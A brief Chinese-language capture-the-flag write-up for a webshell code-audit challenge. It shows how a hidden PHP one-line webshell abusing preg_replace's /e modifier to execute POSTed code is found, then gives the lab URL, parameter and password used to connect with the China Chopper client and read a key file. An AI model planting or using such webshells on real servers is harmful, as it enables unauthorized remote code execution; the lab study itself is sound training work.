WebShell代码分析溯源(第8题)
难易程度:★★
题目类型:代码审计
使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀
1.访问网页,下载网页源代码。
2.审查php文件,根据修改时间,发现可疑文件。
3.打开文件,发现确实是一句话木马病毒文件。
|.*|e可以把匹配来的字符串当作正则表达式执行,配合preg_replace函数使用。
所以就可以执行preg_replace('|.*|e','$_POST['pass'],' '),相当于一句话木马。
4.我们知道密码和参数后,尝试使用菜刀连接。
url为http://219.153.49.228:40060/www/fields/class-wp-rest-comment-meta-style.php?e=preg_replace
密码为pass
5.成功连接后,我们打开html文件夹,发现key_e857ab.php。
6.打开文件后获取key。